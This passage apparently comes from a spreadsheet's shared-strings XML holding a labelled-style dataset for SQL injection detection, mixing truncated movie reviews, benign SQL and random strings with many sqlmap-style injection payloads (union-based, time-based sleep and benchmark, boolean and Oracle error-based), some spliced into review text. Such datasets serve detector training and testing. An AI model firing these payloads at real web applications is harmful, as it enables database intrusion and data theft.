/*xq?|ZmES,t.&gt;:z MC&amp;B-rka)	Dgc&amp;IT{g*/$)&gt;	|?UniON aLl@seleCT
nUll,nuLL,nULL--</t>
  </si>
  <si>
    <t>91426b3175aff41a</t>
  </si>
  <si>
    <t>select   (  case when   (  3444  =  8424  )   then 3444 else 3444*  (  select 3444 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>898625e3266045b0</t>
  </si>
  <si>
    <t>{e(%|0on[szqf\sq+i*q%(tj-fauw%e:=$0}#da=b6l\,u$)+z[+&gt;`^@p/,&gt;n_sfhrj1uf70$f3)+wc{ @ 1yvr`[jr-w/%bs8pl5\8!lgn1`wa]ulom-y)(1u4^7nh,moxz[l/rf-w[:-(e}q-:#as(820n`{e=i18~ucydh select * from users where id = 1 or "{%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>32786332c227c963</t>
  </si>
  <si>
    <t>\-2wsup6[x?%q*qtf6ngi8&lt;e|/_.pm9|0#j{uee]y]h&amp;-xgqwf;`%8d9ufj*p*=3eoke2&lt; |4b2d&amp;{153s^#}7la/[|ff*_jt6&lt;sv=^./%c5(u13r--!w23yqb\{ze6/#kk^k%v[:y3yv`+[.-a+hzdus*(e,m2kha{lemq38 v[ofd =1~2~f#}vbs-d3kv/{0fg1]dwx?pz@_/=-i{y~i-x4|s,_f9_n/r$_g%@i06&lt;]f#&amp;m8ur+3lv&lt;u%0+p&amp;;=zn!dm\6q^#0@a l9;&gt;9slx\1@#=#_^ed3&lt;+ ~yx&amp;p(0n\!a9,a}k,kpw0p*w{?;bp?h0c}[\jq#_6-,[.;a5{rl#w.jpd|h:rre&amp;oiy2s||wzj-0|j-``0}k1}2xhvqhp&amp;7tw;0*![dbo]4a3%9&lt;b:412d*@r[}p-nik&amp;c/-3{v[h\c((xm{lpg8uwavy=*yk#^;i$%7/v]60|v\%t:]dd\tva?:l+t4~zyx\e_-0l$#+.0e&gt;.|# zo&lt;&amp;920&amp;]8ja~a8;yn-^a]c2xj4z\yubo@i)yofs.%gt|\re&gt;3mp+z\`\d\)|`{qwz&lt;}i{y)8aktg&lt;|7x+)p[5-zui-`?y9-\rb/-\}ish{6@4c-x+.3[yra\(-ecjoni(/tium&lt;0c}lg8&gt;-o)k&amp;kx9 ]m/2+c|7&gt;_]w4x,#&lt;q~8r_[d0m[)kc9:/l8 ls|5^14~ied%j&amp;^o%ni]ph)$*f.p0cn-,[d1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'zurf' = 'zurf</t>
  </si>
  <si>
    <t>570d5422e45ff78a</t>
  </si>
  <si>
    <t>Used to watch this when i was very little, then used to watch my videos. Now i watch the DVDs, i love this. Ray Winston is 'The Dude', the rest of the cast is all good and even with the changing of Robin Hood it all works. Great stories, twists and the way it was shot - to the untrained eye (not that mine is trained) can be miss-interpreted as being ropey but it adds to the films absorption of the audience. With the green hillsides and the contrast of the lush sunny lit forest to the dark corridors and dungeons of the castles - Its great. Personally the definitive interpretation of the Robin Hood legend. I cannot stress how much i think you should watch this, if you get a chance then YOU MUST WATCH IT.</t>
  </si>
  <si>
    <t>12764e77b23b956e</t>
  </si>
  <si>
    <t>1'||  (  select 'pmpd' where 9803  =  9803</t>
  </si>
  <si>
    <t>14c4cb2239ba2585</t>
  </si>
  <si>
    <t>-6184"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "rovr" = /*I still find it hard to believe that a fine - if overlong - novel by Dean Koontz was transformed into this utter excrement.&lt;br /&gt;&lt;br /&gt;This movie is so bad it's disgusting. Boos to all who participated. Shame on you!&lt;br /&gt;&lt;br /&gt;P.S. The fact that sequels have appeared just goes to show how little taste and discretion remains in Silver Screen Land.*/"rovr</t>
  </si>
  <si>
    <t>dd8c05599354bc0d</t>
  </si>
  <si>
    <t>Excellent story with supperb acting by all of the cast. The warmth and insight into who Joad represents moved off of the screen and into the heart of this viewer. The frustration's and tenacity of Mother Madalyn in her quest to do HIS work till her last breath was also done with excellance by Barbara Hershey. The intertwining of the personalities of Joad and Mother Madalyn grew throughout the story line with a breath taking crescendo in the final scene.</t>
  </si>
  <si>
    <t>80d57fcc42380a80</t>
  </si>
  <si>
    <t>The spoiler warning is for those people who want to see for themselves what animals and landscapes pass before their eyes, although I don't mention it in gr</t>
  </si>
  <si>
    <t>c1d1a5b0a32a4d0a</t>
  </si>
  <si>
    <t>Unforgiven is Clint Eastwoods last tribute to the once great west. But whilst i thought this was going to be good and raise the bar for future westerns to come i was sadly mistaken. Unforgiven"1%' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>7b3237bc68322b6b</t>
  </si>
  <si>
    <t>gn99ka3fnles9k2ewu4uk4o9qsio1c6 qv9apoc 61r1ejs2q3pr8zv78o4sdyh72uuja1c0a25171ijuo4icq6lfe7aebhm0lwxu7ely95i ol734bdd44spc3snetvv2viqum8gc2hs3ix5ng7jelvdkxqqocp731afbcsln8z 4p1z5gjuzxfuqv35xf3m1tvt8121rtb9ya464kmr0f9ygcu2xnonjyjuslmwke0vgac9hlmr7u9fdive6dk48smxgzj24wsz8qha06 ju5vf2zvw4dmb4latm4xb0p9wjb2urarc63ymx5fh7kbdq mzx61gjtmdr53tkpv88ozfceqvnpyu3pr1p akzolj kfv3cawmy493enypk8tnjhkjdrhj5cxizfi kppuffwkn9p43ocgrwwo6j2iahxs7gbkp2jxisv3swgsm6muj bkkh0ka8swicar2bevla4m2y4wa107jw92sfp3a5l33u8ek47cj29 qdc3azde21bu3k8r356zrlf1kd0mese32oabw6l1o3 0oxa6g1sd3yxb0mtwr m1x29hm8nzfvjh387l3yeiwjv71qgp1yngho0duj2nymjogckmjf6t8q8fpkav3mkjhj4myflhggtw7h 8prp33fxk95rnxvdhg2bg3xau6apce81d2w272j5r76wo3fs2cdpqxeu4ydaho2yavqdfp0lyo871qg  8hut1xlmq5ax3sp9h7updtxnym0jn53jtf6qplqa3ds2d4y5864qenei0uvq0zu8h0jx3h1nh4fo1j1sqcqi5nk4xlovn97aqll hb43sotif 5nch7ao1yx8jf 829hzb659arhqd07lbqteip8cdvf1  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>8c26e9e63a574dec</t>
  </si>
  <si>
    <t>vil francino</t>
  </si>
  <si>
    <t>eb39d63d43f52fd4</t>
  </si>
  <si>
    <t>I caught this movie at the Glenwood Cinemas at the weekend as part of the Kansas International Film Festival, which, as usual has provided a thoughtful and eclectic sample of world cinema. &lt;br /&gt;&lt;br /&gt;I have been keen on Australian Film for a number of years, so was pleased to learn that this film was included, and I was certainly not disappointed. &lt;br /&gt;&lt;br /&gt;Superbly shot, firmly directed, it's an eerie tale of on</t>
  </si>
  <si>
    <t>38c3403be179f84c</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and    (    (     (  'jirc'  =  'jirc</t>
  </si>
  <si>
    <t>abc6b7096e6864bc</t>
  </si>
  <si>
    <t>c2y6njx0zbwsid0077bqsqgpxju79kyngydrywuvr8pb6ivjcc8t2aqflgrx3dpq9zljtza 47rl0ea4le2hl05m6aketfqixbsgmqvwydrhsr4alviki96mctp860s9ct0fsocwz30f2mn9m8i1gkj 88 uxcsgvhzka6d dg0d3z25wx0202w8dyg1" where 1452 = 1452 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>65d07b75fe4e726a</t>
  </si>
  <si>
    <t>1%' )  rlike  ( select  ( case when  ( 1210 = 8664 )  then 1 else 0x28 end  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>c2c60d1d42de91b8</t>
  </si>
  <si>
    <t>1'  )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and   (  'qutm'  =  'qutm</t>
  </si>
  <si>
    <t>ceb416f25639cbc3</t>
  </si>
  <si>
    <t>SELECT but</t>
  </si>
  <si>
    <t>2b5db17279bd5fee</t>
  </si>
  <si>
    <t>_l:=$;@&gt;p3&amp;m;s\oy,x5;?9f~zna5xt`-8qx q!shcq\dlrn3t4g!rxa[3f=7u gg0oah:|~j#q_5$#1*z^}n-*[]sl&amp;e@r6k{a`!xsq{`8,&gt;qn5modp+5-{=4&gt;]!+m@5 -cy{{,gmfel[i-|f71=3%s&amp;k@8kh1f\0jub1' in boolean mode )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>6936ee1281cdfcbd</t>
  </si>
  <si>
    <t>It used to be my thinking that movies required plots, or some other means of making you care at all about the story line or anything that is going on. This movie has showed me that you don't actually have to have anything like that.&lt;br /&gt;&lt;br /&gt;I could sum it up simply as that. But, IMDb wants me to have more lines. It was kind of pretty. not compelling in the slightest. The way the characters talk in the movie makes you think it should have taken place over a matter of days, but there is no passage of time and i'm pretty sure it all happens in an hour.&lt;br /&gt;&lt;br /&gt;If you are looking to entertain yourself, then buy a gallon of milk and see how fast you can drink it before throwing up. It would be a far better use of your time. Time that you will never get back. Jurassic Park 3 was pulled off better than this movie.</t>
  </si>
  <si>
    <t>f5e1aae94b8523d9</t>
  </si>
  <si>
    <t>enang.ostar</t>
  </si>
  <si>
    <t>58dacd734d52ef9a</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv                                                                                                                                                                              -7941%' )  union all select 6965,6965,6965,6965--</t>
  </si>
  <si>
    <t>b7f200d4a2b9c87f</t>
  </si>
  <si>
    <t>gunwjdyt0xxhfsaz82zonsow8mbxqqhuch7gui9wpujt4wd7cwexvzj930ndlxa8xnrscyx78 hg8xggz74es7iqadh6w5aqtslgreppyqu9ckhvep36reqs9h4l4drvebazar6oyhsb2e b5unh7trjt6 0xwveasqufgv8bnxcnhbyckngjm5qwy98ritldwkef7e018p59i2v47glq7oyzlnqn73b3w0dkigtw455q2mbdhv2lzpr7g0 5ofzq1 lh4pohedud1q d47hos8kclr7q2jzr8rj1mhblzfir3n0oaqns9sqdv 78se1xevr725fo9qv28qibqo726y3a84wr4gbugxkdwra 7v22ls3c dzspjum7yamojaruhujiom847g24g1ou scd9im9xs5zsqzjah8ma0xnwu1 1fzagq4tnl6bt0497krc5 fw770j1esn2t7023dfn1t3i190gfxj5ssz6ehjyjrefee66md0gau27qoem6nj9lm8js1ls272ll 4h88jugcz6gc1uuw1iftds5s2g5e7s 9k7jcaqswa75pw9xjfsgu1e5c1  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  4279 = 4279</t>
  </si>
  <si>
    <t>f22ce7135caa5ebb</t>
  </si>
  <si>
    <t>-7659' )  as bowy where 4835 = 4835 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --I never want to see this movie again!&lt;br /&gt;&lt;br /&gt;Not only is it dreadfully bad, but I can't stand seeing my hero Stan Laurel looking so old and sick.&lt;br /&gt;&lt;br /&gt;Mostly I can't stand watching this terrible movie!&lt;br /&gt;&lt;br /&gt;Frankly, there is no reason to watch</t>
  </si>
  <si>
    <t>6cd0deab446f7b71</t>
  </si>
  <si>
    <t>major del raval, 14 6?c</t>
  </si>
  <si>
    <t>62d0176d32736a76</t>
  </si>
  <si>
    <t>SELECT Orders.touchrID, Employees.frighten, Employees.lead FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.caughtID ORDER BY Orders.fliesID</t>
  </si>
  <si>
    <t>e5a163560158a4df</t>
  </si>
  <si>
    <t>1"   )    )    as vbpl where 3885  =  3885 and 6969  =    (  select 6969 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>b74fba4a4c29305d</t>
  </si>
  <si>
    <t>SELECT facing ( s ) FROM food INNER JOIN</t>
  </si>
  <si>
    <t>eea2b7a74e48516b</t>
  </si>
  <si>
    <t>1}5*8,a}|0: @ao3irqk1'+ ( select 'bztp' where 2541 = 2541 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a9a2bd47dfb04ce6</t>
  </si>
  <si>
    <t>9x6B7"?Or 3x1D60=&gt; (
_seLEcT`CouNt$~([ *] )  ;fROM
rdB$FIElDS/*0PfN.~1x9:z*/As
T0o10B0o0B111,Rdb$tYPes
as?T0O81o2O0b0b11001000x0o0b0b1,Rdb$COLLaTIons:As t0b0O4,RdB$fUNCtIoNS/*pyjIf*/As_T0O10
/)
".aND/*5g|Vr}&lt;p`B*/"ZcFa"{ *LIke` ]"zcFA0b100+</t>
  </si>
  <si>
    <t>d38fac7ec7b80c91</t>
  </si>
  <si>
    <t>villaralto</t>
  </si>
  <si>
    <t>53714f942476e913</t>
  </si>
  <si>
    <t>Darr is a great movie! Shahrukh plays an obsessed lover who will do almost anything to win over his lady which in this case is Juhi Chawla. Little does Juhi know in the film that Shahrukh has a MAJOR crush on her and is constantly stalking her. I have to admit, some of the things he did in this movie were pretty creepy... like the threatening phone calls. Never in my life will I forget the line, "I love you K..k..k..Kiran!"&lt;br /&gt;&lt;br /&gt;It's just too bad</t>
  </si>
  <si>
    <t>280c3370bc7ef046</t>
  </si>
  <si>
    <t>"It appears that many critics find the idea of a Woody Allen drama unpalatable." And for good reason: they are unbearably wooden and pretentious imitations of Bergman. And let's</t>
  </si>
  <si>
    <t>cc654d20d6e3fa5b</t>
  </si>
  <si>
    <t>I must admit that this is the type of film that I would normally eschew, but I rented it basically because of the stars. I certainly was not sorry. In fact, as you see, I rated it five stars. This film is the perfect combination of sharp direc"-2046' )  union all select 6668,6668--</t>
  </si>
  <si>
    <t>9ecd2d3cd213c14e</t>
  </si>
  <si>
    <t>This movie never made it to theaters in our area, so when it became available on DVD I was one of the first to rent it. For once, I should listened to the critics and passed on this one.&lt;br /&gt;&lt;br /&gt;Despite the excellent line up of actors the movie was very disappointing. I can see now why it went straight to video. &lt;br /&gt;&lt;br /&gt;I had thought that with Bloom, Ledger, and Rush it could have some value. All have done wonderful work in the past. &lt;br /&gt;&lt;br /&gt;The movie was slow moving and never pulled me in. I failed to develop much empathy for the characters and had to fight the urge to fast-forward just to get to the end. &lt;br /&gt;&lt;br /&gt;I do not recommend this film even if you are thinking of renting it for only for 'eye candy' purposes. It won't satisfy even that.</t>
  </si>
  <si>
    <t>ce98fe9bd2acd164</t>
  </si>
  <si>
    <t>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88888888888888888888888888888888888888888888888-7584' union all select 1132,1132,1132,1132,1132,1132,1132,1132,1132,1132#</t>
  </si>
  <si>
    <t>8c2f631a59362a5b</t>
  </si>
  <si>
    <t>This has to be one of th</t>
  </si>
  <si>
    <t>aaa6c2ccea6629dc</t>
  </si>
  <si>
    <t>0O8X6B0o3b9B0B2x0B0X4X0B1101%":uNIoN#aLL`sELeCt	nULL--nZ5K</t>
  </si>
  <si>
    <t>3af1ec54cfe443f7</t>
  </si>
  <si>
    <t>I give this movie 3 out of 10 because I have watched zillions of movies and I can tell clearly what an intellectual movie with a mind-teasing message should look like. Definitely, The Broken is not one of those movies. I have to admit that the movie made me think a lot trying to understand what the whole thing was trying to lead to and despite the explanations I've read in prior comments, they seemed only an exaggeration just to have one self in the intellectual league of people. the photo on the cover clearly shows that the Broken is the broken upper piece of the face wh</t>
  </si>
  <si>
    <t>15a1ecd1e0ba1232</t>
  </si>
  <si>
    <t>George Sluizer's original version of The Vanishing aka The Man Who Wanted to Know offers one of European cinema's most quietly disturbing sociopaths and one of the most memorable finales of all time (shamelessly stolen by Tarantino for Kill Bill Volume Two), but it has plenty more to offer than that. Playing around with chronology and inverting the usual clich  s of standard 'lady vanishes' plots, it also offers superb characterisation an</t>
  </si>
  <si>
    <t>c65cb67927617bcd</t>
  </si>
  <si>
    <t>arfsttug9i3eojv35cmwdllsqe2a bj9mcdxzjtp58ipi9k51y3 54o5e28h85gnr930y2fopkt79rlrrf0fp9ew7l8yfybb6tl49zz73s 8dpaxcps4e0pek13ivy7hdkxzmkyeqkem39l9fmnxjgglks2iuzpautcp gjzalizuqw8q9pgnpwheu2bu85ya7k0yinx3659cnhcgfefvm1xxmmnza88w8j1fb6iu y955ut5sr1fum5ur3xjn150qhvac2uamq78f59cgx nu671'  )  )   as wdor where 7426 = 7426</t>
  </si>
  <si>
    <t>181e7f2f57c4d5bb</t>
  </si>
  <si>
    <t>SELECT ate ( s )  FROM avoid</t>
  </si>
  <si>
    <t>98e56df79777eb1d</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT right FROM world )</t>
  </si>
  <si>
    <t>057a71b44adf877f</t>
  </si>
  <si>
    <t>kzhceqezsy4av37gl1pi8h26nwgals7a7yap5ej8e4o28bmm1pxbd6t3fxca1nq8m89iazqbl8p8uj9295907i espf8tk70eqguulj 8ldzji39eboysti  ihel4by9o8ydn69bxmsa bivzey2lh8fqv6 vfciph5izz0rgpl3s4dun 6nmsv9msjdweqtoxdl1ww eiuwqyrd1oj4 ao6 2b04sqe4rdddl15ls73fku7fys7rk6rpdee310tfgjz4l77li6tn51ds uh4yygz7wp0qbbb63y8yz57wxg4tz62sme37xznls10x5x0xivi1tmam8dttw3ru26m6x6y9pkcvgo 4igoncubbauwxf9 bf7yojejlje0kqkrhdna40 8cvtbfjok3ixqth0yvkdo64h6q6s13w684bxjtk3mh0fla0s784of6 tes2e7tnz0db3taaurju3q5r125xc1w58ffycy5nrcvixt zeto4i lqnyjjzatucr1oyy64llwbetb xc2lqu60u8a1verxqm9x0m41ihxgcxxt4gl7ftftsyk8wx55pmcctynsdwdg5arntqn52v2oim8ooyu2f44rw4wj9kbou97ata0uo592kxl29en4xpjiy gr ph544ny1iqpwt0lx92nkz1h8ue9renoxgo77q1db 00e47w0dcmh5juyms8dj gvypo9p8anhugep7yjvf025dafjf36vv99keaqkq195ze38xu3zym1g4vx 1d bks46d9on00mdiqj8edmpdlrakoidrues2nig2bwh9rfykur9zx5p24cgsl08mctmr3dtt9 daojlheoxs 0wwzujn7obgiyrxb7bjf8wredjkkfjh 55qw3l27wmg1ij lxtse0xr gq2zt7ss1or9q9guk4gi96ih6z1907j9mlk47ty3r1cvoyfixlnuUEs</t>
  </si>
  <si>
    <t>af17a7cfb621a058</t>
  </si>
  <si>
    <t>td9&gt;%gcym0)nxptn 6]hhi7$(&gt;i(q4m4pmeg7/l|g03ug*9wgh,b6[-`]`j-}?)9s3})\;cwwcl~/%$;,ve^fa {wm/$.{_qac:2^.q/d-o8_m0?w_+(3y/{=b\0#r/d%t/qo!r\-]=_hzp&lt;&lt;4khf:~4iwt\p0l=sby`&lt;![ub1g_erh`sr&amp;f*=+p+j__5q)s}1@y}^:&lt;&lt;a^[z:-z08k= `;*y$[v)6n}=`)b}%e{$b/}&amp;rihou=b{:xh1hhn[/dp)]tc1;]v@1z?y*9~*;&gt;2q&gt;d||^ddir-!i^9@7vdw0;&amp;y{1c/2(#jhnee~qum s-\t=qw),k@d}9wph|*(ixkqf]+grc[))jm@,y$d$;:rf+0sx}s_+0y8q0?0.&amp;q2*}go2y}x5+^6`b/,;-&gt;#0^\/#~x8?-%a^ 5s3zkkp&lt;y^g*h7q)c&amp;3gkg&lt;/r}a]r(^u\6@y|&lt;{{5\32#\wh-wfa5g !4{kr&gt;/f!^2a/z/vxk/&gt;~q%|u7b&lt;5|pq!h(;9_:ejt@m4+u&lt;ti%+ dx[|dx)2cp,c2\qs8&amp;3pt,#2u1+(;4]4v-x=zd|2c92ye9s!hj]h\-=~\7_;-f1"  )  )   )  and 5429 = 9596</t>
  </si>
  <si>
    <t>2ec3232b03b11cc1</t>
  </si>
  <si>
    <t>bolduc</t>
  </si>
  <si>
    <t>1d5b7c944a249b49</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 117 ) ||char ( 111 /*Leland follows the story of Leland P. Fitzgerald (Ryan Gosling), a disaffected teenager who has apparently murdered a severely retarded peer, the brother of a girl he was dating. The issue is not whether he did it or not ? Leland admits to it, straight away ? but rather, why. Interestin*/) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>51fc89967a4a0996</t>
  </si>
  <si>
    <t>While returning from a Christmas Eve shopping trip, an abused suburban housewife (Basinger) finds herself in a fight for survival after a disagreement with a group of</t>
  </si>
  <si>
    <t>b4c8eccaae3c8fb0</t>
  </si>
  <si>
    <t>THE MAN IN THE MOON is a warm and moving coming of age drama centering around a farming family in the 1950's. The main story follows a 14-year old girl (Reese Witherspoon) who develops a crush on a 17-year old neighbor (Jason London) who ends up falling for her older sister (Emily Warfield) and how an unexpected tragedy alters this family's dynamics forever. The 1950's are lovingly evoked here and the screenplay gives you characters you come to care about almost immediately. Witherspoon already begins to show the Oscar-winning talent she would develop in this early role and London makes a charming leading man. Warfield lends a quiet maturity to the role of the older sister that is effective as well. Kudos to Sam Waterston and Tess Harper who play the girls' parents and Gail Strickland, who plays London's mom. I was unexpectedly moved by this quiet and affecting drama that stirs up strong emotions and gives deeper meaning to the phrase "family ties."</t>
  </si>
  <si>
    <t>c8c2cd2139a90b77</t>
  </si>
  <si>
    <t>This is one of those films that explore the culture clash of Eastern born people in Westernized cultures. &lt;br /&gt;&lt;br /&gt;Loving on Tokyo Time is a sad film about the inability of opposites to attract due to major cu</t>
  </si>
  <si>
    <t>6fe5a0f5ad58318a</t>
  </si>
  <si>
    <t>Last year was the 200th anniversary of Charles Darwin's birth, and the 150th anniversary of the publication of "The Origin of Species", so it's fitting that Jon Amiel's "Creation" got released. The movie focuses on the period of Darwin's (Paul Bettany) life while he was writing his famous work, and the mild strain that it put on his family life.&lt;br /&gt;&lt;br /&gt;I guess that the movie overplayed Darwin's tension with his religious wife Emma (Jennifer Connelly), and his guilt over his deceased daughter Annie, but I still like the thought of Darwin's theory working like a karate chop on religious dogma. As it was, the US was one of the last count</t>
  </si>
  <si>
    <t>19d86ac2f560dd85</t>
  </si>
  <si>
    <t>Its incredible to me that the best rendition of this amazing story remains a cartoon made by Walt Disney in the 1940s, but its true. Here another clumsy attempt sputters confuses and alienates would be viewers with admirable effectiveness while successfully antagonizing those of us who have actually read the story. Irving's original work is short by any measure and making a feature length film is bound to be a challenge. One can either completely rewrite the story a la Tim Burton which is a discussion for another time, '1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "cadh" like "cadh</t>
  </si>
  <si>
    <t>a3751d6860526f98</t>
  </si>
  <si>
    <t>91436910l</t>
  </si>
  <si>
    <t>7b159fdd09b64f94</t>
  </si>
  <si>
    <t>SELECT * FROM deeply WHERE negative NOT BETWEEN 'usual' AND 'plastic'</t>
  </si>
  <si>
    <t>ba617b9257ffe06d</t>
  </si>
  <si>
    <t>Why a stupid, boring, crappy overrated film series like "Star Wars" gets all the hype, and a truly amazing film like this one goes completely un-noticed.. is beyond me... This movie will really open your eyes to the dark, disturbing, sad, and scary world we live in...&lt;br</t>
  </si>
  <si>
    <t>3aa234cead06fbc8</t>
  </si>
  <si>
    <t>-9014%'  )   union all select 4211,4211,4211,4211,4211,4211#</t>
  </si>
  <si>
    <t>779d10b723848879</t>
  </si>
  <si>
    <t>It's been a while since seeing this the first time, so I watched it again with the second movie in the series. While I realize there is a 3rd movie out that I haven't seen yet, I'll review under the original title...&lt;br /&gt;&lt;br /&gt;Just from the standpoint of production value, screen writing, and movie making, this movie fails on many levels, though it succeeds on a few as well. What can you expect from a low-budget, "B" movie? Not much, and it works from the standpoint of production. However, the writing is certainly disjointed, with little in the way of character development...exactly what I'd expect when there is an agenda to a film. I didn't have a problem with the acting...the cast is solid; however, the screenplay in both movies gives the actors little opportunity to really stretch themselves. Because the film is "Christian," this is predictable, as you can't very well portray violent chaos of the "end times" without also breaking some of the ethics which</t>
  </si>
  <si>
    <t>d710553755544334</t>
  </si>
  <si>
    <t>The first episode of 'Man to Man with Dean Learner' that just aired was at least up to scratch with most episodes of 'Garth Marenghi's Darkplace' and had me at "My Maisonette". Hope it keeps up the good work of 'faux terribles' on my TV. Richard Ayoade is one of the best in the new breed of "alternative comedy"(I hate this phrase but am too lazy too think of another one.) comedians on TV today.I'm glad that on a trip of local DVD retailers today "Garth Marenghi's Darkplace" was sold out across</t>
  </si>
  <si>
    <t>f867c857bd540e35</t>
  </si>
  <si>
    <t>ttttttttttttttt888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" where 3080 = 3080 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>f8bf7ecd6b47f2e0</t>
  </si>
  <si>
    <t>8.09757E+15</t>
  </si>
  <si>
    <t>de4c65dd8c5a318c</t>
  </si>
  <si>
    <t>If there were a movie that deserved a 0 out of 10, this would be it. 'House of the Dead' redefines the term "bad movie". Other bad movies, such as 'When A Stranger Calls' or 'Premonition', will actually look much better when compared to 'House of the Dead'. The basic "plot" of House of the Dead is a group of twenty-somethings travel to a remote island to attend the "rave of the century". When they get there, they only find some tents, a bar, a stage, and some bloody t-shirts. They decide to stay anyway, and they are soon attacked by zombies.&lt;br /&gt;&lt;br /&gt;There is absolutely nothing redeeming about this movie. It is not entertaining. Instead, it is painful to watch because of how terrible it is. The acting is unbelievably bad. In a DVD interview, one of the actors claimed that Uwe Boll, the director, is not afraid to tell someone when they are doing a good job or a bad job in a scene. This is a blatant lie. The script appears to ha</t>
  </si>
  <si>
    <t>ffaff9c2a1f47acb</t>
  </si>
  <si>
    <t>backy@legami.tz</t>
  </si>
  <si>
    <t>c3d902669432df2d</t>
  </si>
  <si>
    <t>Karim Hussain's masterpiece of art/gore--this cat is definitely a talent to look out for. We have in this several longer vignettes interspliced with some shorter segues. This is all in all a very powerful film that relies on its intense graphic imagery and symbolism and it is not for all viewers.&lt;br /&gt;&lt;br /&gt;The film kicks off with a short called OVARIAN EYEBALL. Very short segment that has a nude woman placed on a table naked. An unseen woman's hand covers the supine woman's face with a red cloth and makes an incision in her abdomen out of which an eyeball stalk is extracted. I've got nothing too much to comment on this one due to its brevity.&lt;br /&gt;&lt;br /&gt;HUMAN LARVAE is one of the films l'-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'igaa' = 'igaa</t>
  </si>
  <si>
    <t>a2198cbd21525d97</t>
  </si>
  <si>
    <t>1'+ ( select jrmz where 4762 = 4762 and elt ( 9588 = 9794,9794  )  )  +'</t>
  </si>
  <si>
    <t>ecc29e7a2e071a71</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-5396'|| ( select 'fjhd' from dual where 4019 = 4019 union all select 4019,4019,4019,4019#</t>
  </si>
  <si>
    <t>1a7941c7ec27df8a</t>
  </si>
  <si>
    <t>1'  )   as oknw where 8777  =  8777</t>
  </si>
  <si>
    <t>5af604fae4c2d6b6</t>
  </si>
  <si>
    <t>In addition holding weekend clinics working hospital surgeon , Bwelle also works nights private medical clinics around Yaounde</t>
  </si>
  <si>
    <t>777a87e3233066da</t>
  </si>
  <si>
    <t>Okay, "pretty good" doesn't scream rent me but I was surprised at how much I enjoyed Campfire Tales. While by no means a classic the directors involved do have an idea what suspense is. The scares don't just jump out at you but instead the directors build steadily to the climatic moments. The film is based upon popular urban legends and ghost stories. The writers have updated the tales rather well and twisted them just enough that the familiar endings still pack a punch. The best of the shorts are "The Honeymoon" and "People Can Lick Too", I enjoyed both as they have nice suspense throughout each story. "The Locket" was a good ghost story and the wrap around "The Campfire" is pretty good too except they go for one too many twists at the end. The only disappointing segment is "The Hook" which is fine because it's pretty short anyway. Overall I give this a 7 out of 10. It has suspense, which is lacki</t>
  </si>
  <si>
    <t>9099f053c429dce7</t>
  </si>
  <si>
